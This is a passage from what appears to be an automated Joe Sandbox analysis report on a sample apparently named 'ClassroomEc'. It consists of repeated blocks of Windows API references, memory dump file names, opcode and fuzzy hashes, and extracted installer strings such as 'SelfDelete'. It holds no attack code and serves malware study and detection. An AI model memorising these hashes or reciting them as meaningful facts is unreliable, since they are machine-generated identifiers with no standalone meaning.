                                                                                                                                                        • Part of subcall function 00A72CC0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A72CCA
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A76ADE
                                                                                                                                                      • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76B07
                                                                                                                                                      • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76B59
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A76B7E
                                                                                                                                                      • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76BED
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Root$Concurrency::details::Root::~$AllocatorDebugHeap$Concurrency::Root::
                                                                                                                                                      • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                      • API String ID: 2885122008-372238525
                                                                                                                                                      • Opcode ID: 37ae1ca4b779b7ddf196ae60ef1d4d4dd651382f8c370b7e8ac3de4314de43cf
                                                                                                                                                      • Instruction ID: 08d791bff75c24aea2fb2e82fd8914bf6e801bd07ed31bf73e5e25979579ed05
                                                                                                                                                      • Opcode Fuzzy Hash: 37ae1ca4b779b7ddf196ae60ef1d4d4dd651382f8c370b7e8ac3de4314de43cf
                                                                                                                                                      • Instruction Fuzzy Hash: 82414771D00148AACF09FBA0EE92BEDBB78AF14304F54C168F45676192EF316B59C7A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A79100: SendMessageW.USER32(00000000,?,00000000,000004B3), ref: 00A79120
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000004B5), ref: 00A7AA80
                                                                                                                                                      • SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A7AAAC
                                                                                                                                                      • GetSystemMenu.USER32(00000000,00000000,000004B4,00000000,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00A7AADD
                                                                                                                                                      • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00A7AAF7
                                                                                                                                                      • SetFocus.USER32(00000000,000004B4,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00A7AB0B
                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00A7AB25
                                                                                                                                                      • EnableWindow.USER32(00000000,00000002), ref: 00A7AB3C
                                                                                                                                                      • ShowWindow.USER32(00000000,000004B5,00000000), ref: 00A7AB5D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$EnableLongMenu$FocusItemMessageSendShowSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2770945220-0
                                                                                                                                                      • Opcode ID: 4e3bef64a39925db0fe65341cc72f54ac5b617db9610c3eef581c678386e4445
                                                                                                                                                      • Instruction ID: 84f1406ee25396a7076239a6f7779288c5b397aff6446a732f7f20b0cb61f353
                                                                                                                                                      • Opcode Fuzzy Hash: 4e3bef64a39925db0fe65341cc72f54ac5b617db9610c3eef581c678386e4445
                                                                                                                                                      • Instruction Fuzzy Hash: AD410D70B40209ABDB04EFA4DE5ABAEB375AB84701F10C129F21A7B2E1CF756D41CB55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00A798FA
                                                                                                                                                      • GetSystemMetrics.USER32(0000003D), ref: 00A7990F
                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 00A79919
                                                                                                                                                      • GetSystemMetrics.USER32(0000003E), ref: 00A79929
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00A79963
                                                                                                                                                      • DrawTextW.USER32(00000000,00000000,000000FF,00000000,?), ref: 00A79984
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00A799C4
                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A799D7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2466489532-0
                                                                                                                                                      • Opcode ID: 41447bb3a1a3639308b56f91c2239d2bc3c22bd939f77dfca7634713a728748d
                                                                                                                                                      • Instruction ID: ad3146d2b94a9f20c27f2335bd752cd61b0f8a712c47ba631dce0f6ae02d5997
                                                                                                                                                      • Opcode Fuzzy Hash: 41447bb3a1a3639308b56f91c2239d2bc3c22bd939f77dfca7634713a728748d
                                                                                                                                                      • Instruction Fuzzy Hash: 3A31BE75A00109EFDB04DFA8D998A9EBBB5FF48310F20C55AF919A7390CB359A41CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A841E0: ??3@YAXPAX@Z.MSVCRT ref: 00A841F5
                                                                                                                                                        • Part of subcall function 00A841E0: ??2@YAPAXI@Z.MSVCRT ref: 00A8421A
                                                                                                                                                        • Part of subcall function 00A84280: ??3@YAXPAX@Z.MSVCRT ref: 00A84295
                                                                                                                                                        • Part of subcall function 00A84280: ??2@YAPAXI@Z.MSVCRT ref: 00A842AA
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A818C2
                                                                                                                                                      • std::exception::exception.LIBCMTD ref: 00A818CA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@std::exception::exception
                                                                                                                                                      • String ID: !$@$@$@
                                                                                                                                                      • API String ID: 1147900709-3902203808
                                                                                                                                                      • Opcode ID: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
                                                                                                                                                      • Instruction ID: 226722792930e3982347f38cde68f7c38cb28dbf051fbdbe1d98ba1d41bf470e
                                                                                                                                                      • Opcode Fuzzy Hash: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
                                                                                                                                                      • Instruction Fuzzy Hash: 2122D970D11118DFCB18EFA8C9A5BEDBBB6BF84304F148159E44A6B252DB306E46CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A73880: lstrlenW.KERNEL32(00A717FC,?,?,00A717FC,?,00A996DC), ref: 00A73888
                                                                                                                                                        • Part of subcall function 00A73880: lstrlenW.KERNEL32(?,?,00A717FC,?,00A996DC), ref: 00A73895
                                                                                                                                                        • Part of subcall function 00A73880: _wcsnicmp.MSVCRT ref: 00A738AC
                                                                                                                                                      • _wtol.MSVCRT(?), ref: 00A71A92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$_wcsnicmp_wtol
                                                                                                                                                      • String ID: GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete
                                                                                                                                                      • API String ID: 24125944-3877767935
                                                                                                                                                      • Opcode ID: cff5401f6205dd16402a1c811b59e1fb00b043b628eed4ecb099f2b1246cbc2d
                                                                                                                                                      • Instruction ID: 09f9291427aff71176e8a6da359ed35aa8cb04adb6439a59176a6bcb39bd1c66
                                                                                                                                                      • Opcode Fuzzy Hash: cff5401f6205dd16402a1c811b59e1fb00b043b628eed4ecb099f2b1246cbc2d
                                                                                                                                                      • Instruction Fuzzy Hash: 5DB15E70B40008EBCB18DB9CCE929BDB3F2AF80745F64C159F40AAB281E6759E91E755
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7AE39
                                                                                                                                                      • wsprintfW.USER32 ref: 00A7AE8C
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7AECF
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7AEF3
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$Unothrow_t@std@@@__ehfuncinfo$??2@_wmemmovewsprintf
                                                                                                                                                      • String ID: %d%%$0u
                                                                                                                                                      • API String ID: 3297093599-3442222605
                                                                                                                                                      • Opcode ID: ee1d7b60bd6a3739d8f9cd74b862f758a245f7d1995a23128eddacc18a1b5569
                                                                                                                                                      • Instruction ID: 480795dd0d3c8b311e3ba7ee4d42d9bc1cd0d37c123ed955eccdbd969e319b8f
                                                                                                                                                      • Opcode Fuzzy Hash: ee1d7b60bd6a3739d8f9cd74b862f758a245f7d1995a23128eddacc18a1b5569
                                                                                                                                                      • Instruction Fuzzy Hash: A9314F71E10208BBDB04EBD4DD96EEEB379EB98300F10C159E1197B292DB70A905CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00A7A6CA
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00A7A6F4
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A7A725
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7A73B
                                                                                                                                                      • SHGetMalloc.SHELL32(00000000), ref: 00A7A75C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorBrowseDebugFolderFromHeapListMallocPathmemset
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 1414482492-3554254475
                                                                                                                                                      • Opcode ID: 13cd9e771d6b69ab593a0a71a92d6b2792aa2274e9878daf25129b608d406936
                                                                                                                                                      • Instruction ID: 8c7592c42c84c0db3c46a014b79865714a827335b7e2a877161ec0735020b0ee
                                                                                                                                                      • Opcode Fuzzy Hash: 13cd9e771d6b69ab593a0a71a92d6b2792aa2274e9878daf25129b608d406936
                                                                                                                                                      • Instruction Fuzzy Hash: FD21CB70A4021D9BDB64EB54DD8CBD9B3B5AF98300F1081D9A50DA7260DB749EC5CF92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B40A
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B415
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B420
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B42B
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B436
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B441
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                                      • Opcode ID: c84649eeb78ef2128d15dfdc8215ad4db7adab1b0e83806b9e995885cf6cc534
                                                                                                                                                      • Instruction ID: b8f7417c96da7ffe6968f8acf85cdd95630cc833d4539c89344515067e1efebc
                                                                                                                                                      • Opcode Fuzzy Hash: c84649eeb78ef2128d15dfdc8215ad4db7adab1b0e83806b9e995885cf6cc534
                                                                                                                                                      • Instruction Fuzzy Hash: 7821B970A04108EBCB08EFD8C695B9EB7F1AF44308F648198D5052B342CB75AF11DBD6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A75885
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                        • Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5
                                                                                                                                                        • Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A758C3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                      • String ID: %%T$%%T/$%%T\
                                                                                                                                                      • API String ID: 3527340311-3604420949
                                                                                                                                                      • Opcode ID: 34d831abcfaa119da21ed88b2ef6909e40e68dd02f00fa36053d3701e04a2a1c
                                                                                                                                                      • Instruction ID: 69943358477b15d02f8ea0f3dd716434a85d5d175f352dc3ee4a330e6111d66a
                                                                                                                                                      • Opcode Fuzzy Hash: 34d831abcfaa119da21ed88b2ef6909e40e68dd02f00fa36053d3701e04a2a1c
                                                                                                                                                      • Instruction Fuzzy Hash: E611A771960008BBCF08FFA4DE92DEEB378AE54700F40C55CB51726192EF706A09CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A75A05
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                        • Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5
                                                                                                                                                        • Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A75A43
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                      • String ID: %%M$%%M/$%%M\
                                                                                                                                                      • API String ID: 3527340311-1781175070
                                                                                                                                                      • Opcode ID: 6d0618fca4522d31b718163de0f3251cf0003507dda31b955d2e0d088ca7c54b
                                                                                                                                                      • Instruction ID: acfdbfd83f1c90da313f6b533e4ba2e4ba0d1a94e9e8af0ccb34a1b7af140a91
                                                                                                                                                      • Opcode Fuzzy Hash: 6d0618fca4522d31b718163de0f3251cf0003507dda31b955d2e0d088ca7c54b
                                                                                                                                                      • Instruction Fuzzy Hash: 6511A771960008BBDF08FBE4DE92DEEB378AE54700F44C55CB51726192EF706A49CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A75945
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                        • Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5
                                                                                                                                                        • Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A75983
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap_wmemmove$??3@
                                                                                                                                                      • String ID: %%S$%%S/$%%S\
                                                                                                                                                      • API String ID: 3527340311-1963631775
                                                                                                                                                      • Opcode ID: 49decf933e5914c9b8772d54afa086e8894a2c0d69770b8392e92fe2e451f707
                                                                                                                                                      • Instruction ID: 7e56bced87c20f30c2cfb556253e64db9d2d7fcc3bdeea0e1869e6d674124a74
                                                                                                                                                      • Opcode Fuzzy Hash: 49decf933e5914c9b8772d54afa086e8894a2c0d69770b8392e92fe2e451f707
                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A771960008BBCF08FBA4DE92DEEB378AE54700F40C55CB51736192EF706A09CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: &
                                                                                                                                                      • API String ID: 2221118986-1010288
                                                                                                                                                      • Opcode ID: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
                                                                                                                                                      • Instruction ID: 1b5cf7aa5d137396257664312e1566b9f6817df1d57e4d0367e028944fa7ddd1
                                                                                                                                                      • Opcode Fuzzy Hash: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
                                                                                                                                                      • Instruction Fuzzy Hash: 41412A70E05208EFDF05CFA8C996BADBBB1BF54308F248198D9456B381D6719B44EB84
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A9370A
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93715
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93720
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A9372B
                                                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93736
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3936482309-0
                                                                                                                                                      • Opcode ID: c46c3d21da292d5c287f262b2d8b2787b558d5b8c417251ead2f5585576ed1b7
                                                                                                                                                      • Instruction ID: 2bd62cf56b9d2322456a7da70dc9b9418f9941f6982406b5c6146f236e92e9c1
                                                                                                                                                      • Opcode Fuzzy Hash: c46c3d21da292d5c287f262b2d8b2787b558d5b8c417251ead2f5585576ed1b7
                                                                                                                                                      • Instruction Fuzzy Hash: F9218574A10108EFDB08DF88C6A4B9EB7F1AF44308F248198D8052B342CB75AF45EBD5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97ED4
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A97EE0
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A97EE8
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A97EF0
                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A97EFC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
